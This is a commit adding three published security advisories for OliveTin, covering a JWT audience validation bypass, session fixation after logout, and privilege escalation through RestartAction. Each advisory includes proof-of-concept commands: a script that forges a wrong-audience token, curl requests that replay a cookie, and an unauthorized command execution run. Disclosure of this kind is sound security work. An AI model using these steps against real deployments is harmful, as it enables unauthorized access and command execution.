Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit ab9093676ce7 · 2026-03-05T20:54:17.000Z
GHSA-g962-2j28-3cg9 GHSA-gq2m-77hf-vwgh GHSA-p443-p7w5-2f7f
diff --git a/advisories/github-reviewed/2026/03/GHSA-g962-2j28-3cg9/GHSA-g962-2j28-3cg9.json b/advisories/github-reviewed/2026/03/GHSA-g962-2j28-3cg9/GHSA-g962-2j28-3cg9.json
@@ -0,0 +1,64 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-g962-2j28-3cg9",
+  "modified": "2026-03-05T20:52:12Z",
+  "published": "2026-03-05T20:52:12Z",
+  "aliases": [],
+  "summary": "OliveTin has JWT Audience Validation Bypass in Local Key and HMAC Modes",
+  "details": "### Summary\n\nWhen JWT authentication is configured using either:\n\n- `authJwtPubKeyPath` (local RSA public key), or\n- `authJwtHmacSecret` (HMAC secret),\n\nthe configured audience value (`authJwtAud`) is not enforced during token parsing.\nAs a result, validly signed JWT tokens with an incorrect `aud` claim are accepted for authentication.\nThis allows authentication using tokens intended for a different audience/service.\n\n### Details\n\n**Affected Code**\n\nFile: `jwt.go`\nLines: 51–59, 144–157, 161–168\n\n**Current Behavior**\n\nRemote JWKS Mode (Correct):\n```go\nreturn jwt.Parse(jwtToken, jwksVerifier.Keyfunc, jwt.WithAudience(cfg.AuthJwtAud))\n```\nAudience validation is enforced.\n\nLocal Public Key Mode (Vulnerable):\n```go\nreturn jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })\n```\nNo `jwt.WithAudience()` option is provided.\n\nHMAC Mode (Vulnerable):\n```go\nreturn jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })\n```\nNo `jwt.WithAudience()` option is provided.\n\n**Why This Is Vulnerable:** `authJwtAud` is ignored for `authJwtPubKeyPath` and `authJwtHmacSecret` modes, so wrong-audience tokens are accepted.\n\n### PoC\n\n1. **Configure OliveTin**\n\n   Use a minimal config with JWT local key authentication:\n   ```yaml\n   authJwtPubKeyPath: ./public.pem\n   authJwtHeader: Authorization\n   authJwtClaimUsername: sub\n   authJwtAud: expected-audience\n\n   authRequireGuestsToLogin: true\n   ```\n\n2. **Generate a Wrong-Audience Token**\n   ```python\n   python3 - <<EOF\n   import jwt, datetime\n\n   with open(\"private.pem\") as f:\n       key = f.read()\n\n   token = jwt.encode(\n       {\n           \"sub\": \"low\",\n           \"aud\": \"wrong-audience\",   # intentionally wrong\n           \"exp\": datetime.datetime.utcnow() + datetime.timedelta(minutes=30)\n       },\n       key,\n       algorithm=\"RS256\"\n   )\n\n   print(token)\n   EOF\n   ```\n   This prints the `$WRONG_AUD_TOKEN`.\n\n3. **Test Without Token (Baseline)**\n   ```bash\n   curl -i -X POST http://localhost:1337/api/WhoAmI \\\n     -H 'Content-Type: application/json' \\\n     -d '{}'\n   ```\n   Expected response:\n   ```\n   HTTP/1.1 401 Unauthorized\n   ```\n\n4. **Test With Wrong-Audience Token**\n   ```bash\n   curl -i -X POST http://localhost:1337/api/WhoAmI \\\n     -H 'Content-Type: application/json' \\\n     -H \"Authorization: Bearer $WRONG_AUD_TOKEN\" \\\n     -d '{}'\n   ```\n   Expected response:\n   ```\n   HTTP/1.1 200 OK\n   {\"authenticatedUser\":\"low\",\"provider\":\"jwt\",\"usergroup\":\"\",\"acls\":[],\"sid\":\"\"}\n   ```\n   Authentication succeeds even though the `aud` claim is incorrect.\n\n### Impact\n\nAn attacker who possesses a valid JWT signed by the configured key (or HMAC secret) but intended for a different audience can authenticate successfully.\n\nThis enables:\n\n- Cross-service token reuse\n- Authentication using tokens issued for other systems\n- Trust boundary violation in multi-service environments\n\nThis is particularly severe when:\n\n- OliveTin is deployed behind a centralized SSO provider\n- The same signing key is reused across services\n- Audience restrictions are relied upon for service isolation\n\nThis does **not** bypass ACL authorization.\nIt is strictly an authentication validation flaw.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/OliveTin/OliveTin"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.0.0-20260304231339-e97d8ecbd8d6"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-g962-2j28-3cg9"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/commit/e97d8ecbd8d6ba468c418ca496fcd18f78131233"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/OliveTin/OliveTin"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.1"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-287",
+      "CWE-345"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-05T20:52:12Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-gq2m-77hf-vwgh/GHSA-gq2m-77hf-vwgh.json b/advisories/github-reviewed/2026/03/GHSA-gq2m-77hf-vwgh/GHSA-gq2m-77hf-vwgh.json
@@ -0,0 +1,64 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-gq2m-77hf-vwgh",
+  "modified": "2026-03-05T20:53:08Z",
+  "published": "2026-03-05T20:53:08Z",
+  "aliases": [],
+  "summary": "OliveTin Session Fixation: Logout Fails to Invalidate Server-Side Session",
+  "details": "### Summary\nOliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default ≈ 1 year).\n\nAn attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass.\n\nThis is a session management flaw that violates expected logout semantics.\n\n### Details\nDuring logout:\n```\n// Logout only clears browser cookie\nresponse.Header().Set(\"Set-Cookie\", localCookie.String())\n```\nHowever, the server still accepts the session:\n```\nsession := sessionStorage.Providers[provider].Sessions[sid]\n...\nreturn session\n```\nThe SID is not deleted from sessionStorage.\n\nWhy vulnerable: Logout does not remove the SID from sessionStorage; old cookie is still accepted until expiry (~1 year).\n\nFile: [api.go](app://-/index.html?hostId=local#), [sessions.go](app://-/index.html?hostId=local#), [local.go](app://-/index.html?hostId=local#)\nLines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47\nBehavior\n- Login → receive SID cookie\n- Logout → cookie cleared client-side\n- Replay old SID manually → still authenticated\n\nExpected:\n- Logout invalidates session immediately\n\nActual:\n- Old SID remains usable until expiry\n\n### PoC\n\nMinimal config\n```\nlistenAddressSingleHTTPFrontend: 0.0.0.0:16642\nauthRequireGuestsToLogin: true\n\nauthLocalUsers:\n  enabled: true\n  users:\n    - username: low\n      usergroup: users\n      password: \"$argon2id$...\"\n\nactions:\n  - title: Dummy\n    id: dummy\n    shell: \"echo dummy\"\n```\n\n### Reproduction\n\nLogin and capture SID:\n```\nLOGIN=$(curl -i -X POST http://localhost:16642/api/LocalUserLogin \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"username\":\"low\",\"password\":\"lowpass\"}')\n\nSID=$(printf '%s\\n' \"$LOGIN\" | awk -F'[=;]' '/olivetin-sid-local/{print $2}')\n```\nWorks before logout:\n```\ncurl -X POST http://localhost:16642/api/WhoAmI \\\n  -H \"Cookie: olivetin-sid-local=$SID\"\n```\nLogout:\n```\ncurl -X POST http://localhost:16642/api/Logout \\\n  -H \"Cookie: olivetin-sid-local=$SID\"\n```\nReplay old cookie:\n```\ncurl -X POST http://localhost:16642/api/WhoAmI \\\n  -H \"Cookie: olivetin-sid-local=$SID\"\n```\nResult\n\nUser is still authenticated after logout.\n### Impact\nType:\n\nSession Management Flaw\n\n- Logout Bypass\n- Session Replay\n\nRisk:\n- Stolen cookies remain valid\n- Persistent unauthorized access\n- Users falsely believe logout ended the session\n\nAttack scenarios:\n- Shared computers\n- XSS/session theft\n- Proxy logs\n- Malware/browser compromise",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/OliveTin/OliveTin"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.0.0-20260304233115-d6a0abc3755d15"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-gq2m-77hf-vwgh"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/commit/d6a0abc3755d43107be1939567c52953bcbec3d5"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/OliveTin/OliveTin"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.1"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-384",
+      "CWE-613"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-05T20:53:08Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-p443-p7w5-2f7f/GHSA-p443-p7w5-2f7f.json b/advisories/github-reviewed/2026/03/GHSA-p443-p7w5-2f7f/GHSA-p443-p7w5-2f7f.json
@@ -0,0 +1,64 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-p443-p7w5-2f7f",
+  "modified": "2026-03-05T20:53:46Z",
+  "published": "2026-03-05T20:53:46Z",
+  "aliases": [],
+  "summary": "OliveTin's RestartAction always runs actions as guest",
+  "details": "### Summary\nAn authentication context confusion vulnerability in RestartAction allows a low‑privileged authenticated user to execute actions they are not permitted to run.\n\nRestartAction constructs a new internal connect.Request without preserving the original caller’s authentication headers or cookies. When this synthetic request is passed to StartAction, the authentication resolver falls back to the guest user. If the guest account has broader permissions than the authenticated caller, this results in privilege escalation and unauthorized command execution.\n\nThis vulnerability allows a low‑privileged authenticated user to bypass ACL restrictions and execute arbitrary configured shell actions.\n\n### Details\nAffected files:\n\nservice/internal/api/api.go\n\nservice/internal/auth/authcheck.go\n\nRelevant code in RestartAction:\n\n```\nreturn api.StartAction(ctx, &connect.Request[apiv1.StartActionRequest]{\n    Msg: &apiv1.StartActionRequest{\n        BindingId:        execReqLogEntry.GetBindingId(),\n        UniqueTrackingId: req.Msg.ExecutionTrackingId,\n    },\n})\n```\nAuthentication in StartAction:\n```\nauthenticatedUser := auth.UserFromApiCall(ctx, req, api.cfg)\n```\nIssue:\n\n1. RestartAction creates a new connect.Request object.\n\n2. The new request does not preserve caller headers or cookies.\n\n3. UserFromApiCall() attempts to resolve the user from the request.\n\n4. Because authentication headers are missing, it falls back to the guest user.\n\n5. If guest.exec = true while the original caller has exec = false, the action executes with elevated privileges.\n\n### PoC\n\nConfiguration:\n```\ndefaultPermissions:\n  exec: false\n\nusers:\n  - username: low\n    password: lowpass\n    permissions:\n      exec: false\n\n  - username: guest\n    permissions:\n      exec: true\n\nactions:\n  - id: restart_bypass_action\n    shell: |\n      echo \"pwned\" > /tmp/olivetin_restart_bypass.txt\n```\n\nSteps to reproduce:\n\nLogin as low user\n```\nLOW_LOGIN=$(curl -sS -i -X POST \\\n  http://localhost:1337/olivetin.api.v1.OliveTinApiService/LocalUserLogin \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"username\":\"low\",\"password\":\"lowpass\"}')\n\nLOW_SID=$(printf '%s\\n' \"$LOW_LOGIN\" | tr -d '\\r' | \\\n  awk -F'[=;]' '/^Set-Cookie: olivetin-sid-local=/{print $2; exit}')\n```\nAttempt direct execution (correctly blocked)\n```\nLOW_RUN=$(curl -sS -X POST \\\n  http://localhost:1337/olivetin.api.v1.OliveTinApiService/StartActionAndWait \\\n  -H 'Content-Type: application/json' \\\n  -H \"Cookie: olivetin-sid-local=$LOW_SID\" \\\n  -d '{\"actionId\":\"restart_bypass_action\"}')\n\necho \"$LOW_RUN\"\n```\nThis should return permission denied.\n\nExtract executionTrackingId from response:\n```\nTRACKING_ID=$(printf '%s' \"$LOW_RUN\" | \\\n  sed -n 's/.*\"executionTrackingId\":\"\\([^\"]*\\)\".*/\\1/p' | head -n1)\n\necho \"Tracking ID: $TRACKING_ID\"\n```\nCall RestartAction:\n```\ncurl -sS -X POST \\\n  http://localhost:1337/olivetin.api.v1.OliveTinApiService/RestartAction \\\n  -H 'Content-Type: application/json' \\\n  -H \"Cookie: olivetin-sid-local=$LOW_SID\" \\\n  -d \"{\\\"executionTrackingId\\\":\\\"$TRACKING_ID\\\"}\"\n```\nVerify command executed:\n```\ncat /tmp/olivetin_restart_bypass.txt\n```\nOutput:\n```\npwned\n```\n\n### Impact\n- Privilege Escalation\n- ACL Bypass\n- Unauthorized Command Execution\n\nAny authenticated low-privilege user can execute actions they are not authorized to run if:\n- Guest has broader permissions\n- RestartAction is enabled\nBecause OliveTin actions execute system shell commands, this can lead to:\n- Arbitrary file writes\n- Sensitive data exposure\n- Potential full host compromise (depending on OliveTin runtime privileges)\n\nThis affects all deployments where:\n- guest.exec = true\n- A restricted user has exec = false\n- RestartAction endpoint is accessible",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/OliveTin/OliveTin"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.0.0-20260305000458-cb46a597b246"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-p443-p7w5-2f7f"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/commit/cb46a597b2465235839ed58cf034b5e7b70ef911"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/OliveTin/OliveTin"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.1"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-250",
+      "CWE-441"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-05T20:53:46Z",
+    "nvd_published_at": null
+  }
+}
